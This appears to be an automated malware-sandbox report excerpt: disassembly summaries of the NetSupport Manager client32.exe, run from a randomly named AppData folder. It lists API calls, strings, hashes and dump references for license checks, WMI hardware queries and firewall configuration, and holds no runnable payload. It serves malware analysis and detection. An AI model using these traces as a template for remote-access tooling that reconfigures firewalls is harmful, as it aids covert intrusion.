                                                                                                                                                    • API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
                                                                                                                                                    • String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
                                                                                                                                                    • API String ID: 3494822531-1878648853
                                                                                                                                                    • Opcode ID: 1e9a8547f1a4d8db54bad5cbccf33acd14b41b9136434f7006fca57feb396e97
                                                                                                                                                    • Instruction ID: 9d2f35c0ca678663173c9787aa50c950699104b7f99c1a06bf1b906e54d037ce
                                                                                                                                                    • Opcode Fuzzy Hash: 1e9a8547f1a4d8db54bad5cbccf33acd14b41b9136434f7006fca57feb396e97
                                                                                                                                                    • Instruction Fuzzy Hash: F3515E76D0422E9BEB15CF24DC50BDDF7B4AF15708F6001A4DC897B681EB716A88CB91
                                                                                                                                                    APIs
                                                                                                                                                    • _calloc.LIBCMT ref: 6CA92FBB
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 6CA9300D
                                                                                                                                                    • InterlockedExchange.KERNEL32(-00039761,00000000), ref: 6CA9301B
                                                                                                                                                    • _calloc.LIBCMT ref: 6CA9303B
                                                                                                                                                    • _memmove.LIBCMT ref: 6CA93049
                                                                                                                                                    • InterlockedDecrement.KERNEL32(-000397B9), ref: 6CA9307F
                                                                                                                                                    • SetEvent.KERNEL32(0000031C,?,?,?,?,?,?,?,?,?,?,?,?,?,?,935334B3), ref: 6CA9308C
                                                                                                                                                      • Part of subcall function 6CA928D0: wsprintfA.USER32 ref: 6CA92965
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Interlocked_calloc$CountDecrementEventExchangeTick_memmovewsprintf
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3178096747-0
                                                                                                                                                    • Opcode ID: ee1a78fabebeeaf760761f120e2bcdfb95ac1fdd5ae294650fb287ad7744603e
                                                                                                                                                    • Instruction ID: 8ea96c168268155aa0594380548b35b2b3f79b4fa31167f35b4c3603af993e9d
                                                                                                                                                    • Opcode Fuzzy Hash: ee1a78fabebeeaf760761f120e2bcdfb95ac1fdd5ae294650fb287ad7744603e
                                                                                                                                                    • Instruction Fuzzy Hash: 794187F6D01209AFDB04DFA9C945AEFB7F8EF48304F008519E519E7640E7719A49CBA0
APIs
• IsJPIK.PCICHEK(1EF76653,NSM.LIC,?,1102F092,View,Client,Bridge), ref: 1102A6F6
  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
  • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: _free_malloc_memsetwsprintf
• String ID: IKS$NSM.LIC$Serial_no$_License$iks.lic
• API String ID: 2814900446-469156069
• Opcode ID: 6b47238fab61831cef20a34caab7796142392b501bb087f0e81239e19d18b0f2
• Instruction ID: 268b58c6f7511c145cb41d8ae554306eba274149ba0ed4ca5467e6687dcac3b5
• Opcode Fuzzy Hash: 6b47238fab61831cef20a34caab7796142392b501bb087f0e81239e19d18b0f2
• Instruction Fuzzy Hash: 8931AF35E01729ABDB00CFA8CC81BEEFBF4AB49714F104299E826A72C0DB756940C791
APIs
• WaitForSingleObject.KERNEL32(00000310,000000FF), ref: 1101792C
• CoInitialize.OLE32(00000000), ref: 11017935
• _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101795C
• CoUninitialize.COMBASE ref: 110179C0
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: InitializeObjectSingleStringUninitializeW@16Wait
• String ID: PCSystemTypeEx$Win32_ComputerSystem
• API String ID: 2407233060-578995875
• Opcode ID: 0942cf205f413e43a7dce2a9957458248f39d685d8b5fb2cae19ac9a1649f750
• Instruction ID: 979ee595df3e366e36f6db43f9274242a875182caa54ddfda208ac7f01cc4ef4
• Opcode Fuzzy Hash: 0942cf205f413e43a7dce2a9957458248f39d685d8b5fb2cae19ac9a1649f750
• Instruction Fuzzy Hash: BE213EB5D0166A9FDB11CFA48C40BBAB7E99F4170CF0000B4EC59DB188EB79D544D791
APIs
• WaitForSingleObject.KERNEL32(00000310,000000FF), ref: 11017842
• CoInitialize.OLE32(00000000), ref: 1101784B
• _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017872
• CoUninitialize.COMBASE ref: 110178D0
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: InitializeObjectSingleStringUninitializeW@16Wait
• String ID: ChassisTypes$Win32_SystemEnclosure
• API String ID: 2407233060-2037925671
• Opcode ID: 645120171e4998cce48753e45b0062292f56c9bef21460c25a07f93c3742c313
• Instruction ID: 35f99737241494c501e89beb979cd88c9c6eddc8ed8b09fe319fdcc96c080ea2
• Opcode Fuzzy Hash: 645120171e4998cce48753e45b0062292f56c9bef21460c25a07f93c3742c313
• Instruction Fuzzy Hash: D7210875D4112A9BD711CFA4CD40BAEBBE89F40309F0000A4EC29DB244EE75D910C7A0
APIs
Strings
• DoICFConfig() OK, xrefs: 111396D6
• Client, xrefs: 11139655
• DesktopTimerProc - Further ICF config checking will not be performed, xrefs: 111396EC
• AutoICFConfig, xrefs: 11139650
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CountTick
• String ID: AutoICFConfig$Client$DesktopTimerProc - Further ICF config checking will not be performed$DoICFConfig() OK
• API String ID: 536389180-1512301160
• Opcode ID: e88b596b7c5c4cd1ec5207dbc2eaab29f042a609f248b0ca23653edaa92bfa31
• Instruction ID: a12453e9faa0d912da9f55e5525ca7a81223e7cd1b6d2efb44fc6fc6c8488c0a
• Opcode Fuzzy Hash: e88b596b7c5c4cd1ec5207dbc2eaab29f042a609f248b0ca23653edaa92bfa31
• Instruction Fuzzy Hash: 2B21277CA262AF4AFB12CE75DED4791FA92278232EF010178D515862CCFBB49448CF46
                                                                                                                                                    APIs
                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 11096DA4
                                                                                                                                                    • CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,111385EB), ref: 11096DBE
                                                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000001,111C1B4C,?,?,?,?,?,?,?,111385EB), ref: 11096DDB
                                                                                                                                                    • CoUninitialize.OLE32(?,?,?,?,?,?,111385EB), ref: 11096DF9
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFromInitializeInstanceProgUninitialize
                                                                                                                                                    • String ID: HNetCfg.FwMgr$ICF Present:
                                                                                                                                                    • API String ID: 3222248624-258972079
                                                                                                                                                    APIs
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11026306
                                                                                                                                                    • K32GetProcessImageFileNameA.KERNEL32(?,00000000,11030983,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026322
                                                                                                                                                    • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11026336
                                                                                                                                                    • SetLastError.KERNEL32(00000078,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026359
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$ErrorFileImageLastNameProcess
                                                                                                                                                    • String ID: GetModuleFileNameExA$GetProcessImageFileNameA
                                                                                                                                                    • API String ID: 4186647306-532032230
                                                                                                                                                    APIs
                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,776CC3F0,00000000,?,11110F55,11110AF0,00000001,00000000), ref: 11110057
                                                                                                                                                    • CreateThread.KERNEL32(00000000,11110F55,00000001,00000000,00000000,0000000C), ref: 1111007A
                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,11110F55,11110AF0,00000001,00000000,?,?,?,?,?,11031700), ref: 111100A7
                                                                                                                                                    • CloseHandle.KERNEL32(?,?,11110F55,11110AF0,00000001,00000000,?,?,?,?,?,11031700), ref: 111100B1
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                                                    • String ID: ..\ctl32\Refcount.cpp$hThread
                                                                                                                                                    • API String ID: 3360349984-1136101629
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: wsprintf
                                                                                                                                                    • String ID: %s%s%s.bin$358075$_HF$_HW$_SW
                                                                                                                                                    • API String ID: 2111968516-1244234249
                                                                                                                                                    APIs
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 6CA96950
                                                                                                                                                      • Part of subcall function 6CA97BE0: _memset.LIBCMT ref: 6CA97BFF
                                                                                                                                                      • Part of subcall function 6CA97BE0: _strncpy.LIBCMT ref: 6CA97C0B
                                                                                                                                                      • Part of subcall function 6CA8A4E0: EnterCriticalSection.KERNEL32(6CACB898,00000000,?,?,?,6CA8DA7F,?,00000000), ref: 6CA8A503
                                                                                                                                                      • Part of subcall function 6CA8A4E0: InterlockedExchange.KERNEL32(?,00000000), ref: 6CA8A568
                                                                                                                                                      • Part of subcall function 6CA8A4E0: Sleep.KERNEL32(00000000,?,6CA8DA7F,?,00000000), ref: 6CA8A581
                                                                                                                                                      • Part of subcall function 6CA8A4E0: LeaveCriticalSection.KERNEL32(6CACB898,00000000), ref: 6CA8A5B3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalSection$CountEnterExchangeInterlockedLeaveSleepTick_memset_strncpy
                                                                                                                                                    • String ID: 1.2$Channel$Client$Publish %d pending services
                                                                                                                                                    • API String ID: 1112461860-1140593649
                                                                                                                                                    APIs
                                                                                                                                                    • GlobalAddAtomA.KERNEL32(NSMDesktopWnd), ref: 11103683
                                                                                                                                                    • GetStockObject.GDI32(00000004), ref: 111036DB
                                                                                                                                                    • RegisterClassA.USER32(?), ref: 111036EF
                                                                                                                                                    • CreateWindowExA.USER32(00000000,NSMDesktopWnd,?,00000000,00000000,00000000,00000000,00000000,00130000,00000000,11000000,00000000), ref: 1110372C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: AtomClassCreateGlobalObjectRegisterStockWindow
• String ID: NSMDesktopWnd
• API String ID: 2669163067-206650970
APIs
• RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 11145F70
• RegCloseKey.ADVAPI32(?), ref: 11145FD4
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CloseOpen
• String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
• API String ID: 47109696-3245241687
APIs
  • Part of subcall function 11112140: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1111216A
  • Part of subcall function 11112140: __wsplitpath.LIBCMT ref: 11112185
  • Part of subcall function 11112140: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 111121B9
• GetComputerNameA.KERNEL32(?,?), ref: 11112288
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
• String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
• API String ID: 806825551-1858614750
APIs
  • Part of subcall function 111447F0: GetCurrentProcess.KERNEL32(11029A9F,?,11144A43,?), ref: 111447FC
  • Part of subcall function 111447F0: GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\EQMIUFUUUCW3\client32.exe,00000104,?,11144A43,?), ref: 11144819
• WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 11144E25
• ResetEvent.KERNEL32(00000274), ref: 11144E39
• SetEvent.KERNEL32(00000274), ref: 11144E4F
• WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 11144E5E
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
• String ID: MiniDump
• API String ID: 1494854734-2840755058
APIs
  • Part of subcall function 6CA85000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6CA85014
  • Part of subcall function 6CA85000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6CA88E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6CA85034
• CloseHandle.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 6CA88EAE
• FreeLibrary.KERNEL32(?), ref: 6CA88EBF
  • Part of subcall function 6CA82420: _strrchr.LIBCMT ref: 6CA8242E
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
• Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
Yara matches
Similarity
• API ID: AddressCloseFileFreeHandleLibraryModuleNameProc_strrchr
• String ID: NSM247Ctl.dll$Set Is247=%d$pcictl_247.dll
• API String ID: 3215810784-3459472706
APIs
• LoadStringA.USER32(00000000,0000194E,?,00000400), ref: 111479DF
• wsprintfA.USER32 ref: 11147A16
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: wsprintf$ErrorExitLastLoadMessageProcessString
• String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
• API String ID: 1985783259-2296142801
• Opcode ID: ea150ba1ed1813b9988ca83ab64a483803357b5974e9feb7492af342d5ed009e
• Instruction ID: f4f04ea69c0c381d0959b313e9907706ba85fe26c30e15a9a088fcfc7c116df7
• Opcode Fuzzy Hash: ea150ba1ed1813b9988ca83ab64a483803357b5974e9feb7492af342d5ed009e
• Instruction Fuzzy Hash: 6811E5FAE00218A7D710DEA49D81FEAF36C9B44608F100165FB08F6141EB70AA05CBE4
APIs
• _malloc.LIBCMT ref: 111101C9
  • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
  • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
  • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
• wsprintfA.USER32 ref: 111101E4
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
• _memset.LIBCMT ref: 11110207
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
